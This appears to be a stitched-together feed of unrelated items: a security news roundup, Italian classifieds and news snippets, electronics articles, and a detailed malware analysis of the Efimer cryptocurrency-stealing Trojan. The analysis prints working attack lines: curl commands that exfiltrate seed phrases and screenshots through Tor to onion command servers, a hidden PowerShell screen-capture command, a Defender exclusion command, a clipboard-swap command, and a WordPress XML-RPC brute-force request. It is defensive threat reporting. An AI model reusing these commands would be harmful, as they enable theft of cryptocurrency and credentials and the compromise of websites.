The Internet is fighting over whether robots.txt applies to AI agents. It all started when Cloudflare published a blog post, detailing what the company was seeing from Perplexity crawlers. Of course, automated web crawling is part of how the modern Internet works, and almost immediately after the first web crawler was written, one managed to DoS (Denial of Service) a web site back in 1994. And the robots.txt file was first designed.
Make no mistake, robots.txt on its own is nothing more than a polite request for someone else on the Internet to not index your site. The more aggressive approach is to add rules to a Web Application Firewall (WAF) that detects and blocks a web crawler based on the user-agent string and source IP address. Cloudflare makes the case that Perplexity is not only intentionally ignoring robots.txt, but also actively disguising their webcrawling traffic by using IP addresses outside their normal range for these requests.
And there’s genuinely an interesting argument to be made,that robots.txt is aimed at indexing and AI training traffic, and that agentic AI requests are a different category. Put simply, perplexity bots ignore robots.txt when a live user asks them to. Is that bad behavior, or what we should expect? This question will have to be settled as AI agents become more common.
Breaking Into the Vault
Researchers at Cisco Talos took a look at the Dell ControlVault, a Hardware Security Module (HSM) built into many Dell laptops. The firmware running on these embedded processors had some problems, including a stack-overflow and other memory-related issues. Usually the potential for abuse of these kind of attacks is limited mostly to the theoretical realm, but this embedded HSM also includes accessible USB pins, that can be accessed with a custom connector. The vulnerabilities found, then represent a real attack scenario where the firmware on the HSM can be tampered with, via nothing more than physical access. To prove the point, the Talos write-up includes a great video of a compromised machine accepting a green onion as a valid fingerprint for Windows Login.
Trend Micro In the Wild
Trend Micro’s Apex One system is under active exploitation, as a pair of vulnerabilities allow an authenticated attacker to inject system commands in the system’s management console. The full fix is expected to roll out later this month, but a mitigation disables a specific feature of the console, the Remote Install Agent. This leads to the obvious conclusion that the installation process was allowing for code execution as part of the install process.
GreedyBear
There was an interesting malware campaign run this year, by a group that Koi Security is calling GreedyBear. The campaign could be called a blitz, where malicious browser extensions, ransomware binaries, and scammy websites were all employed at once, with the goal of stealing cryptocurrency. The surprising thing is that so far not much over $1 million has been reported as stolen through the campaign.
The first technique used was “Extension Hollowing”, where safe, boring browser extensions are published, and maintained for a few months. Good reviews come in naturally or are purchased, and the publisher appears trustworthy. Then the extension is updated, with malicious code suddenly shipping. These extensions are now sniffing for user input and form filled data.
The second technique used was the old classic, packing malware into cracked and pirated software. The source of many of these malicious binaries seems to be primarily Russian piracy sites.
The final approach discovered was the simple scam website, often typo-squatting on nearly-legitimate domain names. These sites advertised fake hardware wallets or wallet repair, but only existed to steal whatever information would-be customers were willing to share.
The question may be raised, why does Koi Security believe all this activity is connected? The answer boils down to a single IP address, 185.208.156.66. This was the Command and Control server for the entire network of activity, and should be seen as a definite red flag in logs and records.
HashiCorp Vault Audit
The fine folks at Cyata took a crack at HashiCorp’s Vault, a source available secrets storage solution. And they discovered a host of subtle but important issues. The first on the list is an outstanding find, and it deals with how Vault protects against brute-force attacks. It’s supposed to be a simple counter, that locks out password attempts for a while, once a threshold of failures has been reached. The problem is that usernames aren’t case sensitive, but the failure counter is case sensitive in tracking password failures. Tried guessing the admin password too many times? Try the Admin account next.
The Multi-Factor Authentication has some issues, like the TOTP code reuse protection. This attempts to enforce that a code is only used once while valid. The problem is that a code of “ 123456” and “123456” both evaluate the same for the TOTP valuation itself, but as different codes for the reuse protection. This could enable an attacker to first abuse the reuse protection error message to identify a valid but used code, and then insert the space to be able to use the code for authentication.
After authentication, this same style of attack is possible again, this time targeting the root policy protections. An admin cannot assign this “root” policy, but can assign a “ root” policy. Those are treated as different policy identifiers by the validation code, but the same thing in the final implementation.
And finally, they discovered a Remote Code Execution flaw, via plugin installation. This one requires admin access, but an information leak and an audit log that allows writing to anywhere on the disk is enough to execute code injected in that audit log. This seems to be the first RCE ever made public in Vault, which is an impressive statement for both Hashicorp and Cyata.
Bits and Bytes
Nvidia isn’t taking last week’s talk of backdoors laying down, taking the offensive this week to reassure everyone that “There are no back doors in NVIDIA chips.” There’s a separate bit of news that US lawmakers are considering legislation that would require a kill-switch and location verification in future hardware.
It’s reassuring to be reminded that cyber-criminals do get captured and extradited. A Nigerian man was arrested in France and is being extradited to the US on multiple charges of fraud, identity theft, and other crimes. No word on whether the Nigerian national was or has claimed to be a prince.
And finally, filed in the “awkward” category, Google has disclosed that they were also a victim in the Salesforce hacks that Google researchers discovered and first publicized. These were good-old social engineering campaigns, where the attacker contacted an employee at the target company, and convinces them to read off an eight-digit security code. A group calling itself ShinyHunters has started an exploitation campaign using data pilfered in the attacks.
The Halo 3C is a vape detector installed in schools and public housing. A young hacker found it contains microphones and that it can be turned into an audio bug, raising privacy concerns.#News #Hacking
A couple of years ago, a curious, then-16-year-old hacker named Reynaldo Vasquez-Garcia was on his laptop at his Portland-area high school, seeing what computer systems he could connect to via the Wifi—“using the school network as a lab,” as he puts it—when he spotted a handful of mysterious devices with the identifier “IPVideo Corporation.”
After a closer look and some googling, Garcia figured out that a company by that name was a subsidiary of Motorola, and the devices he’d found in his school seemed to be something called the Halo 3C, a “smart” smoke and vape detection gadget. “They look just like smoke detectors, but they have a whole bunch of features like sensors and stuff,” Garcia says.
As he read more, he was intrigued to learn that the Halo 3C goes beyond detecting smoke and vaping—including a distinct feature for discerning THC vaping in particular. It also has a microphone for listening out for “aggression,” gunshots, and keywords such as someone calling for help, a feature that to Vasquez-Garcia immediately raised concerns of more intrusive surveillance.
Upgrade to continue reading
Become a paid member to get access to all premium content Upgrade
Vendo monitor 23" Dell U2312HM, condizioni estetiche perfette, neanche un graffietto. Pixel perfetti, non c'è n'è uno bruciato o spento. Il connettore VGA balla leggermente: se spostate il pc tutti giorni da un po' fastidio, se lo tenete fisso, non ci sono problemi.
Sono inclusi il cavo di alimentazione e quello VGA/HDMI.
Zona di consegna Milano/Pavia. Visto il prezzo e le dimensioni, non credo convenga la spedizione.
Vendo monitor 23" Dell U2312HM, condizioni estetiche perfette, neanche un graffietto. Pixel perfetti, non c'è n'è uno bruciato o spento. Il connettore VGA balla leggermente: se spostate il pc tutti giorni da un po' fastidio, se lo tenete fisso, non ci sono problemi.
Sono inclusi il cavo di alimentazione e quello VGA/HDMI.
Zona di consegna Milano/Pavia. Visto il prezzo e le dimensioni, non credo convenga la spedizione.
Price: 50 € :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
@Informatica (Italy e non Italy 😁) Documenti d’identità rubati dagli hotel italiani, decine di migliaia in vendita sul dark web. A finire sotto attacco sarebbero state tre strutture ricettive del nostro Paese, tutte prese di mira tra giugno e luglio 2025. Oggi il CERT AGID ha comunicato
The Texas Instruments TP4056 is the default charge-controller chip for any maker or hacker working with lithium batteries. And why not? You can get perfectly-functional knockoffs on handy breakout boards from the usual online sources for pennies. Betteridge’s Law aside, [Lefty Maker] thinks that it may well be time to move on from the TP4056 and spends his latest video telling us why, along with promoting an alternative.
His part of choice is another TI chip, the BQ25185. [Lefty] put together his own charge controller board to show off the capabilities of this chip — including variable under- and over-charge protection voltages. Much of his beef with the TP4056 has less to do with that chip than with the cheap charge modules it comes on: when he crows about the lack of mounting holes and proper USB-PD on the knock-off modules, it occurs to us he could have had those features on his board even if he’d used a TP4056.
On the other hand, the flexibility offered by the BQ25185 is great to future-proof projects in case the dominant battery chemistry changes, or you just change your mind about what sort of battery you want to use. Sure, you’d need to swap a few resistors to set new trigger voltages and charging current, but that beats starting from scratch.
[Lefty Maker] also points out some of the advantages to making your own boards rather than relying on cheap modules. Namely, you can make them however you want. From a longer USB port to indicator LEDs and a built-in battery compartment, this charging board is exactly what [Lefty Maker] wants. Given how cheap custom PCBs are these days, it’s not hard to justify rolling your own.
The same cannot be said of genuine TI silicon, however. While the BQ25185 has a few good features that [Lefty Maker] points out in the video, we’re not sure the added price is worth it. Sure, it’s only a couple bucks, but that’s more than a 300% increase!
Negli ultimi anni l’Esercito statunitense ha accelerato lo sviluppo delle armi a energia diretta, e sulla base dei risultati ottenuti ne sta valutando un impiego più ampio anche nel contesto della difesa antimissile. “Le tecnologie per i laser a energia
In June, we encountered a mass mailing campaign impersonating lawyers from a major company. These emails falsely claimed the recipient’s domain name infringed on the sender’s rights. The messages contained the Efimer malicious script, designed to steal cryptocurrency. This script also includes additional functionality that helps attackers spread it further by compromising WordPress sites and hosting malicious files there, among other techniques.
Report summary:
Efimer is spreading through compromised WordPress sites, malicious torrents, and email.
It communicates with its command-and-control server via the Tor network.
Efimer expands its capabilities through additional scripts. These scripts enable attackers to brute-force passwords for WordPress sites and harvest email addresses for future malicious email campaigns.
Kaspersky products classify this threat with the following detection verdicts:
HEUR:Trojan-Dropper.Script.Efimer
HEUR:Trojan-Banker.Script.Efimer
HEUR:Trojan.Script.Efimer
HEUR:Trojan-Spy.Script.Efimer.gen
Technical details
Background
In June, we detected a mass mailing campaign that was distributing identical messages with a malicious archive attached. The archive contained the Efimer stealer, designed to pilfer cryptocurrency. This malware was dubbed “Efimer” because the word appeared in a comment at the beginning of its decrypted script. Early versions of this Trojan likely emerged around October 2024, initially spreading via compromised WordPress websites. While attackers continue to use this method, they expanded their distribution in June to include email campaigns.
Part of the script with comments
Email distribution
The emails that users received claimed that lawyers from a large company had reviewed the recipient’s domain and found words or phrases in its name that infringed upon their registered trademarks. The emails threatened legal action but offered to drop the lawsuit if the domain owner changed the domain name. Furthermore, they even expressed willingness to purchase the domain. The specific domain was never mentioned in the email. Instead, the attachment supposedly contained “details” about the alleged infringement and the proposed buyout amount.
Sample email
In a recent phishing attempt, targets received an email with a ZIP attachment named “Demand_984175” (MD5: e337c507a4866169a7394d718bc19df9). Inside, recipients found a nested, password-protected archive and an empty file named “PASSWORD – 47692”. It’s worth noting the clever obfuscation used for the password file: instead of a standard uppercase “S”, the attackers used the Unicode character U+1D5E6. This subtle change was likely implemented to prevent automated tools from easily extracting the password from the filename.
Archive contents
If the user unzips the password-protected archive, they’ll find a malicious file named “Requirement.wsf”. Running this file infects their computer with the Efimer Trojan, and they’ll likely see an error message.
Error message
Here’s how this infection chain typically plays out. When the Requirement.wsf script first runs, it checks for administrator privileges. It does this by attempting to create and write data to a temporary file at C:\\Windows\\System32\\wsf_admin_test.tmp. If the write is successful, the file is then deleted. What happens next depends on the user’s access level:
If the script is executed on behalf of a privileged user, it adds the C:\\Users\\Public\\controller folder to the Windows Defender antivirus exclusions. This folder will then be used to store various files. It also adds to exclusions the full path to the currently running WSF script and the system processes C:\\Windows\\System32\\exe and C:\\Windows\\System32\\cmd.exe. Following this, the script saves two files to the aforementioned path: “controller.js” (containing the Efimer Trojan) and “controller.xml”. Finally, it creates a scheduler task in Windows, using the configuration from controller.xml.
If the script is run with limited user privileges, it saves only the controller.js file to the same path. It adds a parameter for automatic controller startup to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\controller registry key. The controller is then launched via the WScript utility.
Afterward, the script uses WScript methods to display an error message dialog box and then exits. This is designed to mislead the user, who might be expecting an application or document to open, when in reality, nothing useful occurs.
Efimer Trojan
The controller.js script is a ClipBanker-type Trojan. It’s designed to replace cryptocurrency wallet addresses the user copies to their clipboard with the attacker’s own. On top of that, it can also run external code received directly from its command-and-control server.
The Trojan starts by using WMI to check if Task Manager is running.
If it is, the script exits immediately to avoid detection. However, if Task Manager isn’t running, the script proceeds to install a Tor proxy client on the victim’s computer. The client is used for communication with the C2 server.
The script has several hardcoded URLs to download Tor from. This ensures that even if one URL is blocked, the malware can still retrieve the Tor software from the others. The sample we analyzed contained the following URLs:
The file it downloads from one of the URLs (A46913AB31875CF8152C96BD25027B4D) is the Tor proxy service. The Trojan saves it to C:\\Users\\Public\\controller\\ntdlg.exe. If the download fails, the script terminates.
Assuming a successful download, the script launches the file with the help of WScript and then goes dormant for 10 seconds. This pause likely allows the Tor service to establish a connection with the Onion network and initialize itself. Next, the script attempts to read a GUID from C:\\Users\\Public\\controller\\GUID. If the file cannot be found, it generates a new GUID via createGUID() and saves it to the specified path.
The GUID format is always vs1a-<4 random hex characters>, for example, vs1a-1a2b.
The script then tries to load a file named “SEED” from C:\\Users\\Public\\controller\\SEED. This file contains mnemonic phrases for cryptocurrency wallets that the script has collected. We’ll delve into how it finds and saves these phrases later in this post. If the SEED file is found, the script sends it to the server and then deletes it. These actions assume that the script might have previously terminated improperly, which would have prevented the mnemonic phrases from being sent to the server. To avoid losing collected data in case of an error, the malware saves them to a file before attempting to transmit them.
At this point, the controller concludes its initialization process and enters its main operation cycle.
The main loop
In each cycle of operation, the controller checks every 500 milliseconds whether Task Manager is running. As before, if it is, the process exits.
If the script doesn’t terminate, it begins to ping the C2 server over the Tor network. To do this, the script sends a request containing a GUID (Globally Unique Identifier) to the server. The server’s response will be a command. To avoid raising suspicion with overly frequent requests while maintaining constant communication, the script uses a timer (the p_timer variable).
As we can see, every 500 milliseconds (half a second), immediately after checking if Task Manager is running, p_timer decrements by 1. When the variable reaches 0 (it’s also zero on the initial run), the timer is reset using the following formula: the PING_INT variable, which is set to 1800, is multiplied by two, and the result is stored in p_timer. This leaves 1800 seconds, or 30 minutes, until the next update. After the timer updates, the PingToOnion function is called, which we discuss next. Many similar malware strains constantly spam the network, hitting their C2 server for commands. The behavior quickly gives them away. A timer allows the script to stay under the radar while maintaining its connection to the server. Making requests only once every half an hour makes them much harder to spot in the overall traffic flow.
The PingToOnion function works hand-in-hand with CheckOnionCMD. In the first one, the script sends a POST request to the C2 using the curl utility, routing the request through a Tor proxy located at localhost:9050 at the address: http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php
The server’s response is saved to the user’s %TEMP% directory at %TEMP%\cfile. curl -X POST -d "' + _0x422bc3 + '" --socks5-hostname localhost:9050 ' + PING_URL + ' --max-time 30 -o ' + tempStrings + '\\cfile After a request is sent to the server, CheckOnionCMD immediately kicks in. Its job is to look for a server response in a file named “cfile” located in the %TEMP% directory. If the response contains a GUID command, the malware does nothing. This is likely a PONG response from the server, confirming that the connection to the C2 server is still alive and well. However, if the first line of the response contains an EVAL command, it means all subsequent lines are JavaScript code. This code will then be executed using the eval function.
Regardless of the server’s response, the Trojan then targets the victim’s clipboard data. Its primary goal is to sniff out mnemonic phrases and swap copied cryptocurrency wallet addresses with the attacker’s own wallet addresses.
First, it scans the clipboard for strings that look like mnemonic (seed) phrases.
If it finds any, these phrases are saved to a file named “SEED” (similar to the one the Trojan reads at startup). This file is then exfiltrated to the server using the PingToOnion function described above with the action SEED parameter. Once sent, the SEED file is deleted. The script then takes five screenshots (likely to capture the use of mnemonic phrases) and sends them to the server as well.
They are captured with the help of the following PowerShell command: powershell.exe -NoProfile -WindowStyle Hidden -Command "$scale = 1.25; Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $sw = [System.Windows.Forms.SystemInformation]::VirtualScreen.Width; $sh = [System.Windows.Forms.SystemInformation]::VirtualScreen.Height; $w = [int]($sw * $scale); $h = [int]($sh * $scale); $bmp = New-Object Drawing.Bitmap $w, $h; $g = [Drawing.Graphics]::FromImage($bmp); $g.ScaleTransform($scale, $scale); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size); $bmp.Save(\'' + path.replace(/\\/g, '\\\\') + '\', [Drawing.Imaging.ImageFormat]::Png); ' + '$g.Dispose(); $bmp.Dispose();" The FileToOnion function handles sending files to the server. It takes two arguments: the file itself (in this case, a screenshot) and the path where it needs to be uploaded.
Screenshots are sent to the following path on the server: http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/recvf.php Files are also sent via a curl command: curl -X POST -F "file=@' + screenshot + '" ' + '-F "MGUID=' + GUID + '" ' + '-F "path=' + path + '" ' + '--socks5-hostname localhost:9050 "' + FILE_URL + '" After sending the file, the script goes idle for 50 seconds. Then, it starts replacing cryptocurrency wallet addresses. If the clipboard content is only numbers, uppercase and lowercase English letters, and includes at least one letter and one number, the script performs additional checks to determine if it’s a Bitcoin, Ethereum, or Monero wallet. If a matching wallet is found in the clipboard, the script replaces it according to the following logic:
Short Bitcoin wallet addresses (starting with “1” or “3” and 32–36 characters long) are replaced with a wallet whose first two characters match those in the original address.
For long wallet addresses that start with “bc1q” or “bc1p” and are between 40 and 64 characters long, the malware finds a substitute address where the last character matches the original.
If a wallet address begins with “0x” and is between 40 and 44 characters long, the script replaces it with one of several Ethereum wallets hardcoded into the malware. The goal here is to ensure the first three characters match the original address.
For Monero addresses that start with “4” or “8” and are 95 characters long, attackers use a single, predefined address. Similar to other wallet types, the script checks for matching characters between the original and the swapped address. In the case of Monero, only the first character needs to match. This means the malware will only replace Monero wallets that start with “4”.
This clipboard swap is typically executed with the help of the following command: cmd.exe /c echo|set/p= + new_clipboard_data + |clip After each swap, the script sends data to the server about both the original wallet and the replacement.
Distribution via compromised WordPress sites
As mentioned above, in addition to email, the Trojan spreads through compromised WordPress sites. Attackers search for poorly secured websites, brute-force their passwords, and then post messages offering to download recently released movies. These posts include a link to a password-protected archive containing a torrent file.
Here’s an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/
The torrent file downloads a folder to the device. This folder contains something that looks like a movie in XMPEG format, a “readme !!!.txt” text file, and an executable that masquerades as a media player. Downloaded files
To watch a movie in the XMPEG format, the user would seemingly need to launch xmpeg_player.exe. However, this executable is actually another version of the Efimer Trojan installer. Similar to the WSF variant, this EXE installer extracts the Trojan’s main component into the C:\\Users\\Public\\Controller folder, but it’s named “ntdlg.js”. Along with the Trojan, the installer also extracts the Tor proxy client, named “ntdlg.exe”. The installer then uses PowerShell to add the script to startup programs and the “Controller” folder to Windows Defender exclusions. cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Controller\' The extracted Trojan is almost identical to the one spread via email. However, this version’s code includes spoofed wallets for Tron and Solana, in addition to the Bitcoin, Ethereum, and Monero wallets. Also, the GUID for this version starts with “vt05”.
Additional scripts
On some compromised machines, we uncovered several other intriguing scripts communicating with the same .onion domain as the previously mentioned ones. We believe the attackers installed these via an eval command to execute payloads from their C2 server.
WordPress site compromise
Among these additional scripts, we found a file named “btdlg.js” (MD5: 0f5404aa252f28c61b08390d52b7a054). This script is designed to brute-force passwords for WordPress sites.
Once executed, it generates a unique user ID, such as fb01-<4 random hex characters>, and saves it to C:\\Users\\Public\\Controller\\.
The script then initiates multiple processes to launch brute-force attacks against web pages. The code responsible for these attacks is embedded within the same script, prior to the main loop. To trigger this functionality, the script must be executed with the “B” parameter. Within its main loop, the script initiates itself by calling the _runBruteProc function with the parameter “B”.
After a brute-force attack is completed, the script returns to the main loop. Here, it will continue to spawn new processes until it reaches a hardcoded maximum of 20.
Thus, the script supports two modes – brute-force and the main one, responsible for the initial launch. If the script is launched without any parameters, it immediately enters the main loop. From there, it launches a new instance of itself with the “B” parameter, kicking off a brute-force attack.
The script’s operation cycle involves both the brute-force code and the handler for its core logic
The brute-force process starts via the GetWikiWords function: the script retrieves a list of words from Wikipedia. This list is then used to identify new target websites for the brute-force attack. If the script fails to obtain the word list, it waits 30 minutes before retrying.
The script then enters its main operation loop. Every 30 minutes, it initiates a request to the C2 server. This is done with the help of the PingToOnion method, which is consistent with the similarly named methods found in other scripts. It sends a BUID command, transmitting a unique user ID along with brute-force statistics. This includes the total number of domains attacked, and the count of successful and failed attacks.
After this, the script utilizes the GetRandWords function to generate a list of random words sourced from Wikipedia.
Finally, using these Wikipedia-derived random words as search parameters, the script employs the getSeDomains function to search Google and Bing for domains to target with brute-force attacks.
Part of the getSeDomains function
The ObjID function calculates an eight-digit hexadecimal hash, which acts as a unique identifier for a special object (obj_id). In this case, the special object is a file containing brute-force information. This includes a list of users for password guessing, success/failure flags for brute-force attempts, and other script-relevant data. For each distinct domain, this data is saved to a separate file. The script then checks if this identifier has been encountered before. All unique identifiers are stored in a file named “UDBXX.dat”. The script searches the file for a new identifier, and if one isn’t found, it’s added. This identifier tracking helps save time by avoiding reprocessing of already known domains.
For every new domain, the script makes a request using the WPTryPost function. This is an XML-RPC function that attempts to create a test post using a potential username and password. The command to create the post looks like this: <?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><string>1</string></value></param><param><value><string>' + %LOGIN%+ '</string></value></param>' + '<param><value><string>' + %PASSWORD%+ '</string></value></param>' + '<param><value><struct>' + '<member>' + '<name>title</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>description</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_keywords</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_excerpt</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '</struct></value></param>' + '<param><value><boolean>1</boolean></value></param>' + '</params>' + '</methodCall> When the XML-RPC request is answered, whether successfully or not, the WPGetUsers function kicks in to grab users from the domain. This function hits the domain at /wp-json/wp/v2/users, expecting a list of WordPress site users in return.
This list of users, along with the domain and counters tracking the number of users and passwords brute-forced, gets written to the special object file described above. The ID for this file is calculated with the help of ObjID. After processing a page, the script lies dormant for five seconds before moving on to the next one.
Meanwhile, multiple processes are running concurrently on the victim’s computer, all performing brute-force operations. As mentioned before, when the script is launched with the “B” argument, it enters an infinite brute-forcing loop, with each process independently handling its targets. At the start of each iteration, there’s a randomly chosen 1–2 second pause. This delay helps stagger the start times of requests, making the activity harder to detect. Following this, the process retrieves a random object file ID for processing from C:\\Users\\Public\\Controller\\objects by calling ObjGetW.
The ObjGetW function snags a random domain object that’s not currently tied up by a brute-force process. Locked files are marked with the LOCK extension. Once a free, random domain is picked for brute-forcing, the lockObj function is called. This changes the file’s extension to LOCK so other processes don’t try to work on it. If all objects are locked, or if the chosen object can’t be locked, the script moves to the next loop iteration and tries again until it finds an available file. If a file is successfully acquired for processing, the script extracts data from it, including the domain, password brute-force counters, and a list of users.
Based on these counter values, the script checks if all combinations have been exhausted or if the maximum number of failed attempts has been exceeded. If the attempts are exhausted, the object is deleted, and the process moves on to a new iteration. If attempts remain, the script tries to authenticate with the help of hardcoded passwords.
When attempting to guess a password for each user, a web page post request is sent via the WPTryPost function. Depending on the outcome of the brute-force attempt, ObjUpd is called to update the status for the current domain and the specific username-password combination.
After the status is updated, the object is unlocked, and the process pauses randomly before continuing the cycle with a new target. This ensures continuous, multi-threaded credential brute-forcing, which is also regulated by the script and logged in a special file. This logging prevents the script from starting over from scratch if it crashes.
Successfully guessed passwords are sent to the C2 with the GOOD command.
Alternative Efimer version
We also discovered another script named “assembly.js” (MD5: 100620a913f0e0a538b115dbace78589). While similar in functionality to controller.js and ntdlg.js, it has several significant differences.
Similarly to the first script, this one belongs to the ClipBanker type. Just like its predecessors, this malware variant reads a unique user ID. This time it looks for the ID at C:\\Users\\Public\\assembly\\GUID. If it can’t find or read that ID, it generates a new one. This new ID follows the format M11-XXXX-YYYY, where XXXX and YYYY are random four-digit hexadecimal numbers. Next up, the script checks if it’s running inside a virtual machine environment.
If it detects a VM, it prefixes the GUID string with a “V”; otherwise, it uses an “R”. Following this, the directory where the GUID is stored (which appears to be the script’s main working directory) is hidden.
After that, a file named “lptime” is saved to the same directory. This file stores the current time, minus 21,000 seconds. Once these initial setup steps are complete, the malware enters its main operation loop. The first thing it does is check the time stored in the “lptime” file. If the difference between the current time and the time in the file is greater than 21,600 seconds, it starts preparing data to send to the server.
After that, the script attempts to read data from a file named “geip”, which it expects to find at C:\\Users\\Public\\assembly\\geip. This file contains information about the infected device’s country and IP address. If it’s missing, the script retrieves information from ipinfo.io/json and saves it. Next, it activates the Tor service, located at C:\\Users\\Public\\assembly\\upsvc.exe.
Afterwards, the script uses the function GetWalletsList to locate cryptocurrency wallets and compile a list of its findings.
It prioritizes scanning of browser extension directories for Google Chrome and Brave, as well as folders for specific cryptocurrency wallet applications whose paths are hardcoded within the script.
The script then reads a file named “data” from C:\\Users\\Public\\assembly. This file typically contains the results of previous searches for mnemonic phrases in the clipboard. Finally, the script sends the data from this file, along with the cryptocurrency wallets it discovered from application folders, to a C2 server at: http://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion/assembly/route.php After the script sends the data, it verifies the server’s response with the help of the CheckOnionCMD function, which is similar to the functions found in the other scripts. The server’s response can contain one of the following commands:
RPLY returns “OK”. This response is only received after cryptocurrency wallets are sent, and indicates that the server has successfully received the data. If the server returns “OK”, the old data file is deleted. However, if the transmission fails (no response is received), the file isn’t deleted. This ensures that if the C2 server is temporarily unavailable, the accumulated wallets can still be sent once communication is re-established.
EVAL executes a JavaScript script provided in the response.
KILL completely removes all of the malware’s components and terminates its operation.
Next, the script scans the clipboard for strings that resemble mnemonic phrases and cryptocurrency wallet addresses.
Any discovered data is then XOR-encrypted using the key $@#LcWQX3$ and saved to a file named “data”. After these steps, the entire cycle repeats.
“Liame” email address harvesting script
This script operates as another spy, much like the others we’ve discussed, and shares many similarities. However, its purpose is entirely different. Its primary goal is to collect email addresses from specified websites and send them to the C2 server. The script receives the list of target websites as a command from the C2. Let’s break down its functionality in more detail.
At startup, the script first checks for the presence of the LUID (unique identifier for the current system) in the main working directory, located at C:\\Users\\Public\\Controller\\LUID. If the LUID cannot be found, it creates one via a function similar to those seen in other scripts. In this case, the unique identifier takes the format fl01-<4 random hex characters>.
Next, the checkUpdate() function runs. This function checks for a file at C:\\Users\\Public\\Controller\\update_l.flag. If the file exists, the script waits for 30 seconds, then deletes update_l.flag, and terminates its operation.
Afterwards, the script periodically (every 10 minutes) sends a request to the server to receive commands. It uses a function named PingToOnion, which is similar to the identically named functions in other scripts.
The request includes the following parameters:
LIAM: unique identifier
action: request type
data: data corresponding to the request type
In this section of the code, LIAM string is used as the action, and the data parameter contains the number of collected email addresses along with the script operation statistics.
If the script unexpectedly terminates due to an error, it can send a log in addition to the statistics, where the action parameter will contain LOGS string, and the data parameter will contain the error message.
The request is sent to the following C2 address: http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php The server returns a JSON-like structure, which the next function later parses.
The structure dictates the commands the script should execute.
This script supports two primary functions:
Get a list of email addresses from domains provided by the server
The script receives domains and iterates through each one to find hyperlinks and email addresses on the website pages.
The GetPageLinks function parses the HTML content of a webpage and extracts all links that reside on the same domain as the original page. This function then filters these links, retaining only those that point to HTML/PHP files or files without extensions.
The PageGetLiame function extracts email addresses from the page’s HTML content. It can process both openly displayed addresses and those encapsulated within mailto links .
Following this initial collection, the script revisits all previously gathered links on the C2-provided domains, continuing its hunt for additional email addresses. Finally, the script de-duplicates the entire list of harvested email addresses and saves them for future use.
Exfiltrate collected data to the server In this scenario, the script anticipates two parameters from the C2 server’s response: pstack and buffer, where:
pstack is an array of domains to which subsequent POST requests will be sent;
buffer is an array of strings, each containing data in the format of address,subject,message.
The script randomly selects a domain from pstack and then uploads one of the strings from the buffer parameter to it. This part of the script likely functions as a spam module, designed to fill out forms on target websites. For each successful data submission via a POST request to a specific domain, the script updates its statistics (which we mentioned earlier) with the number of successful transmissions for that domain.
If an error occurs within this loop, the script catches it and reports it back to the C2 server with the LOGS command.
Throughout the code, you’ll frequently encounter the term “Liame”, which is simply “Email” spelled backwards. Similarly, variations like “Liama”, “Liam”, and “Liams” are also present, likely derived from “Liame”. This kind of “wordplay” in the code is almost certainly an attempt to obscure the malicious intent of its functions. For example, instead of a clearly named “PageGetEmail” function, you’d find “PageGetLiame”.
Victims
From October 2024 through July 2025, Kaspersky solutions detected the Efimer Trojan impacting 5015 Kaspersky users. The malware exhibited its highest level of activity in Brazil, where attacks affected 1476 users. Other significantly impacted countries include India, Spain, Russia, Italy, and Germany.
TOP 10 countries by the number of users who encountered Efimer (download)
Takeaways
The Efimer Trojan combines a number of serious threats. While its primary goal is to steal and swap cryptocurrency wallets, it can also leverage additional scripts to compromise WordPress sites and distribute spam. This allows it to establish a complete malicious infrastructure and spread to new devices.
Another interesting characteristic of this Trojan is its attempt to propagate among both individual users and corporate environments. In the first case, attackers use torrent files as bait, allegedly to download popular movies; in the other, they send claims about the alleged unauthorized use of words or phrases registered by another company.
It’s important to note that in both scenarios, infection is only possible if the user downloads and launches the malicious file themselves. To protect against these types of threats, we urge users to avoid downloading torrent files from unknown or questionable sources, always verify email senders, and consistently update their antivirus databases.
For website developers and administrators, it’s crucial to implement measures to secure their resources against compromise and malware distribution. This includes regularly updating software, using strong (non-default) passwords and two-factor authentication, and continuously monitoring their sites for signs of a breach.
The Boys con Marc Valentine in Italia a Settembre per cinque concerti. freezonemagazine.com/news/marc… Arrivano a Settembre nel nostro paese The Boys con Marc Valentine per una serie di cinque concerti che si preannunciano molto interessanti. The Boys sono una delle leggende del Punk Uk. Nati dalla fuoriuscita di Matt Dagerfield dai London SS che unì le forze con Casino Steel, cui si affiancarono Honest John
Although these days we get to tap into many sources of entropy to give a pretty good illusion of randomness, home computers back in the 1980s weren’t so lucky. Despite this, their random number generators were good enough for games and such, as demonstrated by the [CoCo Town] YouTube channel.
The CoCo is the nickname for the TRS-80 Color Computer, which despite its name, shares absolutely nothing with the TRS-80. Its BASIC version is called Color BASIC, which like many others was based on Microsoft BASIC, so the video’s description should be valid for many other BASIC versions as well. In the video we’re first taken through a basic summary of what the floating point format is all about, before running through an example of the algorithm used by Color BASIC for its RND function, using a test program written in Color BASIC.
As described in the video, the used algorithm appears to be the linear congruential generator, which is a pseudo-random generator that requires minimal resources from the hardware it runs on. Of course, its main disadvantage is that it will fairly rapidly begin to repeat itself, especially with a limited number of output bits. This makes it a decent choice even today for something like simple game logic where you just want to get some variation without aiming for cryptographically secure levels of randomness.
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁) Trump ha chiesto le dimissioni immediate dell'amministratore delegato di Intel, Lip-Bu Tan, accusato di conflitto di interessi con la Cina: in effetti l'imprenditore ha investito in molte aziende cinesi e Cadence Design (l'azienda che ha
